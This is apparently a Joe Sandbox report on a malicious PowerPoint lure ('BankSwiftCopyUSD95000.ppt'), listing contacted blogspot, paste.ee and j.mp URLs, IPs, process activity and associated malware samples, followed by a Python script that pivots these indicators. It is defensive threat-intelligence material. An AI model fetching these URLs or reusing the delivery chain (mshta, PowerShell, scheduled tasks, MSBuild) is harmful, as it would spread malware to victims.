                                                                                                https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspngmshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                    high
                                                                                                    https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippowershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.windows.com/pctv.powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://www.blogger.com/?tab=jjmshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://www.blogger.com/go/contentpolicymshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pimshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://resources.blogblog.com/img/widgets/s_bottom.png)mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlmshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://mainjigijigi123.blogspot.com/p/napmshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQVmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://resources.blogblog.com/img/widgets/s_bottom.pngmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.jsmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://mainjigijigi123.blogspot.com/p/st2222.htmlKmshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.blogger.com/go/devapimshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://mainjigijigi123.blogspot.com/feeds/posts/default?altmshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.blogger.com/go/blogspot-cookiesmshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://resources.blogblog.com/mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://mainjigijigi123.blogspot.com/p/----mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlHmshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.blogger.com/static/v1/jsbin/3767mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.blogger.com/rpc_relay.htmlmshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpfalse
                                                                                                                                              high
URL | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://pki.goog/gsr2/GTS1O1.crt0 | mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
https://mainjigijigi123.blogspot.com/p/st2222.htmld | mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/feeds/posts/defaultng | mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp | false | - | high
http://ocsp.pki.goog/gs | mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.pki.goog/gsr202 | mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
https://pki.goog/repository/0 | mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
https://mainjigijigi123.blogspot.com/p/st2222.html | mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl | mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/p/st2222.html... | mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/feeds/9116518222795791100/posts/default | mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs | mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/static/v1/widgets/84067855-widgets.js | mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp | false | - | high
https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C; | mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/go/adspersonalization | mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/p/st2222.htmlvg | mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/p/st2222.htmls | mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo | mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/go/buzz | mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmp | false | - | high
https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co | mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmp | false | - | high
https://randikhanaekminar.blogspot.com/p/st2.htmlC: | mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmp | false | - | high
https://s.ytimg.com | mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV | mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp | false | - | high
https://backbones1234511a.blogspot.com/p/stback1.html | mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E) | mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV | mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/ | mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp | false | - | high
http://www.cookiechoices.org/ | mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss | mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp | false | - | high
http://crl.pki.goog/gsr2/gsr2.crl0? | mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
https://mainjigijigi123.blogspot.com/js/cookienotice.jsA | mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv | mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp | false | - | high
https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222. | mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmp | false | - | high
https://mainjigijigi123.blogspot.com/p/st2222.htmlw | mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp | false | - | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
108.177.127.132 | unknown | United States | 15169 | GOOGLEUS | false
172.67.219.133 | unknown | United States | 13335 | CLOUDFLARENETUS | false
67.199.248.16 | unknown | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | true
104.18.49.20 | unknown | United States | 13335 | CLOUDFLARENETUS | false
64.188.18.218 | unknown | United States | 8100 | ASN-QUADRANET-GLOBALUS | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339086
Start date: 13.01.2021
Start time: 13:42:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: BankSwiftCopyUSD95000.ppt
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winPPT@46/51@29/5
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                                            • Found application associated with file extension: .ppt
                                                                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                                                                            • Scroll down
                                                                                                                                                                                                            • Close Viewer
                                                                                                                                                                                                            Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 108.177.127.191, 172.217.218.102, 172.217.218.139, 172.217.218.138, 172.217.218.113, 172.217.218.100, 172.217.218.101, 173.194.69.84, 172.217.16.206, 108.177.126.95, 108.177.119.105, 108.177.119.147, 108.177.119.103, 108.177.119.104, 108.177.119.106, 108.177.119.99, 108.177.127.138, 108.177.127.139, 108.177.127.102, 108.177.127.100, 108.177.127.113, 108.177.127.101, 108.177.127.94
• Excluded domains from analysis (whitelisted): gstaticadssl.l.google.com, google.com, fonts.googleapis.com, accounts.google.com, www-google-analytics.l.google.com, fonts.gstatic.com, www.google.com, blogger.l.google.com, www.google-analytics.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
13:44:34 | API Interceptor | 775x Sleep call for process: mshta.exe modified
13:44:39 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
13:44:39 | API Interceptor | 363x Sleep call for process: powershell.exe modified
13:44:40 | API Interceptor | 435x Sleep call for process: taskeng.exe modified
13:44:46 | API Interceptor | 10x Sleep call for process: taskkill.exe modified
13:44:52 | API Interceptor | 253x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
172.67.219.133 | SecuriteInfo.com.Trojan.MSIL.Basic.8.Gen.4059.exe | Get hash | malicious | Browse | paste.ee/r/75Qgb
172.67.219.133 | KxpdSnil5T.exe | Get hash | malicious | Browse | paste.ee/r/DGbIb
172.67.219.133 | 6YCl3ATKJw.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | r0QRptqiCl.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | Hjnb15Nuc3.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | JDgYMW0LHW.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | 4av8Sn32by.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | kigAlmMyB1.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | afvhKak0Ir.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | T6OcyQsUsY.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | 66f8F6WvC1.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | PxwWcmbMC5.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | XnAJZR4NcN.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | PbTwrajNMX.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | I8r7e1pqac.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | wf86K0dpOP.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | 6C1MYmrVl1.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | zZp3oXclum.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | 52nRNUOy3e.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
172.67.219.133 | GDGyU4yuvF.exe | Get hash | malicious | Browse | paste.ee/r/Jcre9
67.199.248.16 | Shipping Document PL and BL003534.ppt | Get hash | malicious | Browse | j.mp/vbdjsagdjgasgcvadfgsadghan
67.199.248.16 | 97LTtjcfr6.ppt | Get hash | malicious | Browse | j.mp/ddkjqwoieoqwjdkw
67.199.248.16 | 97LTtjcfr6.ppt | Get hash | malicious | Browse | j.mp/ddkjqwoieoqwjdkw
67.199.248.16 | http://j.mp/3pyD1MN | Get hash | malicious | Browse | j.mp/3pyD1MN
67.199.248.16 | Order List and Quantities.ppt | Get hash | malicious | Browse | j.mp/asdnwwodpwpkkk
67.199.248.16 | Standardequips_Quote.ppt | Get hash | malicious | Browse | j.mp/ddkjaspoqwiokaslkdkw
67.199.248.16 | 2020141248757837844.ppt | Get hash | malicious | Browse | j.mp/jasasdidjijjjj
67.199.248.16 | Wire Payment PDF.pps | Get hash | malicious | Browse | j.mp/as90i292
67.199.248.16 | DHL-12-8-20.ppt | Get hash | malicious | Browse | j.mp/jasakdoasaooooooasdikasodkowk
67.199.248.16 | DHL-3-12-20.ppt | Get hash | malicious | Browse | j.mp/wasajsidjasdasdkoocs
67.199.248.16 | DHL-3-12-20.ppt | Get hash | malicious | Browse | j.mp/wasajsidjasdasdkoocs
67.199.248.16 | REQUEST FOR BID 26-11-2020.ppt | Get hash | malicious | Browse | j.mp/aafaijsdsdasddkods
67.199.248.16 | NTS_eTaxInvoice.ppt | Get hash | malicious | Browse | j.mp/aksjcoijcoidods
67.199.248.16 | test.ppt | Get hash | malicious | Browse | j.mp/aksjcoijcoidods
67.199.248.16 | TT_Details.ppt | Get hash | malicious | Browse | j.mp/akdkaosdkoasdlookadsddwid
67.199.248.16 | Invoice copy.pps | Get hash | malicious | Browse | j.mp/akdkasdoaksdddwid
67.199.248.16 | 5.pps | Get hash | malicious | Browse | j.mp/akasoasdnaddklkoaskoddwid
67.199.248.16 | Supplier Terms and Guide.pps | Get hash | malicious | Browse | j.mp/aksdjwodokpdnddwid

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
j.mp | https://j.mp/2MBbcFl | Get hash | malicious | Browse | 67.199.248.17
j.mp | Shipping Document PL and BL003534.ppt | Get hash | malicious | Browse | 67.199.248.16
j.mp | 97LTtjcfr6.ppt | Get hash | malicious | Browse | 67.199.248.16
j.mp | 97LTtjcfr6.ppt | Get hash | malicious | Browse | 67.199.248.17
j.mp | 97LTtjcfr6.ppt | Get hash | malicious | Browse | 67.199.248.16
j.mp | https://j.mp/3rJBANn | Get hash | malicious | Browse | 67.199.248.17
j.mp | http://j.mp/3pyD1MN | Get hash | malicious | Browse | 67.199.248.16
j.mp | https://j.mp/3h2fG2Z | Get hash | malicious | Browse | 67.199.248.16
j.mp | Order List and Quantities.ppt | Get hash | malicious | Browse | 67.199.248.16
j.mp | https://j.mp/3nGS85B | Get hash | malicious | Browse | 67.199.248.16
j.mp | Order List and Quantities.ppt | Get hash | malicious | Browse |
                                                                                                                                                                                                            • 67.199.248.17
                                                                                                                                                                                                            Price List.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.17
                                                                                                                                                                                                            Standardequips_Quote.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.16
                                                                                                                                                                                                            https://j.mp/3qWwTPHGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.17
                                                                                                                                                                                                            Purchase list.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.17
                                                                                                                                                                                                            2020141248757837844.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.16
                                                                                                                                                                                                            Consignment Details.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.17
                                                                                                                                                                                                            Wire Payment PDF.ppsGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.16
                                                                                                                                                                                                            PurchaseOrder#Q7677.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.16
                                                                                                                                                                                                            DHL-12-8-20.pptGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.17
paste.ee
    Shipping Document PL and BL003534.ppt | malicious | 104.18.49.20
    SecuriteInfo.com.Trojan.MSIL.Basic.8.Gen.4059.exe | malicious | 172.67.219.133
    PI 99-14.doc__.rtf | malicious | 172.67.219.133
    K2DgDsJylF.exe | malicious | 104.18.48.20
    SecuriteInfo.com.Trojan.GenericKD.45225706.11669.exe | malicious | 104.18.49.20
    QUOTATION FP-240018.doc | malicious | 104.18.49.20
    QUOTATION FP-240018.doc | malicious | 104.18.49.20
    KxpdSnil5T.exe | malicious | 172.67.219.133
    Proforma Invoice.doc | malicious | 104.18.48.20
    Proforma Invoice.doc | malicious | 172.67.219.133
    kRapJ7frPL.exe | malicious | 172.67.219.133
    Order List and Quantities.ppt | malicious | 104.18.49.20
    xWLGUQa6af.exe | malicious | 104.18.48.20
    New Order.doc | malicious | 172.67.219.133
    Order List and Quantities.ppt | malicious | 104.18.49.20
    gTfFj5g1AI.exe | malicious | 104.18.49.20
    INVOICE AMAZON.vbs | malicious | 104.18.49.20
    Consignment Details.ppt | malicious | 104.18.49.20
    PurchaseOrder#Q7677.ppt | malicious | 104.18.48.20
    Remittance Scan00201207.ppt | malicious | 104.18.49.20
blogspot.l.googleusercontent.com
    Shipping Document PL and BL003534.ppt | malicious | 172.217.168.1
    97LTtjcfr6.ppt | malicious | 172.217.168.1
    97LTtjcfr6.ppt | malicious | 172.217.168.1
    97LTtjcfr6.ppt | malicious | 172.217.168.1
    Order List and Quantities.ppt | malicious | 172.217.168.65
    https://naadidbhawdnaha.blogspot.com/?m=0 | malicious | 172.217.22.33
    Order List and Quantities.ppt | malicious | 172.217.22.33
    Price List.ppt | malicious | 172.217.22.33
    Standardequips_Quote.ppt | malicious | 172.217.22.33
    Purchase list.ppt | malicious | 172.217.22.33
    2020141248757837844.ppt | malicious | 172.217.22.33
    Consignment Details.ppt | malicious | 172.217.168.1
    PurchaseOrder#Q7677.ppt | malicious | 172.217.168.1
    DHL-12-8-20.ppt | malicious | 172.217.23.161
    Remittance Scan00201207.ppt | malicious | 172.217.23.161
    PO# 582000678RIMTECHS.ppt | malicious | 216.58.205.65
    DHL-3-12-20.ppt | malicious | 172.217.23.161
    DHL-3-12-20.ppt | malicious | 172.217.23.161
    REQUEST FOR BID 26-11-2020.ppt | malicious | 172.217.168.1
    https://erabansoupala.blogspot.com//?m=0 | malicious | 172.217.168.1
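The rows above are mostly useful as a pivot: the same lure file names recur under different contacted infrastructure (the paste site and the blogspot host), which is how an analyst ties separate submissions into one delivery chain. The script below is an added example, not code from the Joe Sandbox report; ROWS is a subset of the paste.ee and blogspot.l.googleusercontent.com rows copied from the table above as (match, sample name or URL, context IP), and the first group's rows are left out because its match name falls outside this section. The caveat it encodes in comments is the one worth remembering: Joe Sandbox identifies a sample by SHA256 (hidden behind the "Get hash" control), so a repeated file name across groups is a hint, not proof that the same file was submitted twice.

```python
"""Pivot Joe Sandbox 'associated sample' rows on shared infrastructure.

Added example; not code from the Joe Sandbox report. ROWS is a subset of
the paste.ee and blogspot.l.googleusercontent.com rows from the table
above as (match, sample name or URL, context IP). The first group's match
name is not in this section, so its rows are omitted.
"""
from collections import Counter, defaultdict
import ipaddress

ROWS = [
    ("paste.ee", "Shipping Document PL and BL003534.ppt", "104.18.49.20"),
    ("paste.ee", "SecuriteInfo.com.Trojan.MSIL.Basic.8.Gen.4059.exe", "172.67.219.133"),
    ("paste.ee", "PI 99-14.doc__.rtf", "172.67.219.133"),
    ("paste.ee", "K2DgDsJylF.exe", "104.18.48.20"),
    ("paste.ee", "Order List and Quantities.ppt", "104.18.49.20"),
    ("paste.ee", "New Order.doc", "172.67.219.133"),
    ("paste.ee", "INVOICE AMAZON.vbs", "104.18.49.20"),
    ("paste.ee", "Consignment Details.ppt", "104.18.49.20"),
    ("paste.ee", "PurchaseOrder#Q7677.ppt", "104.18.48.20"),
    ("paste.ee", "Remittance Scan00201207.ppt", "104.18.49.20"),
    ("blogspot.l.googleusercontent.com", "Shipping Document PL and BL003534.ppt", "172.217.168.1"),
    ("blogspot.l.googleusercontent.com", "97LTtjcfr6.ppt", "172.217.168.1"),
    ("blogspot.l.googleusercontent.com", "Order List and Quantities.ppt", "172.217.168.65"),
    ("blogspot.l.googleusercontent.com", "https://naadidbhawdnaha.blogspot.com/?m=0", "172.217.22.33"),
    ("blogspot.l.googleusercontent.com", "Price List.ppt", "172.217.22.33"),
    ("blogspot.l.googleusercontent.com", "Consignment Details.ppt", "172.217.168.1"),
    ("blogspot.l.googleusercontent.com", "PurchaseOrder#Q7677.ppt", "172.217.168.1"),
    ("blogspot.l.googleusercontent.com", "DHL-12-8-20.ppt", "172.217.23.161"),
    ("blogspot.l.googleusercontent.com", "Remittance Scan00201207.ppt", "172.217.23.161"),
    ("blogspot.l.googleusercontent.com", "PO# 582000678RIMTECHS.ppt", "216.58.205.65"),
]


def ips_by_match(rows):
    """Distinct context IPs per match, sorted numerically rather than as strings."""
    ips = defaultdict(set)
    for match, _, ip in rows:
        ips[match].add(ip)
    return {m: sorted(s, key=ipaddress.ip_address) for m, s in ips.items()}


def shared_samples(rows):
    """Sample names or URLs seen under more than one match.

    A name recurring under both the paste site and the blogspot host suggests
    one lure that touches both stages of the delivery chain. The report keys
    samples on SHA256 (behind 'Get hash'); a repeated file name is only a
    hint, not proof that the same file was submitted twice.
    """
    matches = defaultdict(set)
    for match, name, _ in rows:
        matches[name].add(match)
    return {n: sorted(m) for n, m in matches.items() if len(m) > 1}


def ip_counts(rows):
    """Number of associated submissions that contacted each IP."""
    return Counter(ip for _, _, ip in rows)


def split_kinds(rows):
    """Separate URL submissions from file submissions (the column mixes both)."""
    is_url = lambda n: n.startswith(("http://", "https://"))
    urls = [n for _, n, _ in rows if is_url(n)]
    files = [n for _, n, _ in rows if not is_url(n)]
    return urls, files


if __name__ == "__main__":
    for match, ips in ips_by_match(ROWS).items():
        print(f"{match}: {', '.join(ips)}")
    for name, matches in shared_samples(ROWS).items():
        print(f"shared lure: {name!r} seen under {matches}")
    for ip, n in ip_counts(ROWS).most_common(3):
        print(f"{ip}: {n} submissions")
```

With the embedded rows, five lure names are reported as shared between the two groups. To turn that hint into a real link, fetch the SHA256 for each row and compare digests, not names.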

ASN

Match
    Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS
    brewin-Invoice024768-xlsx.Html | malicious | 104.16.19.94
    Pokana2021011357.doc | malicious | 172.67.195.152
    09000000000000h.exe | malicious | 172.67.188.154
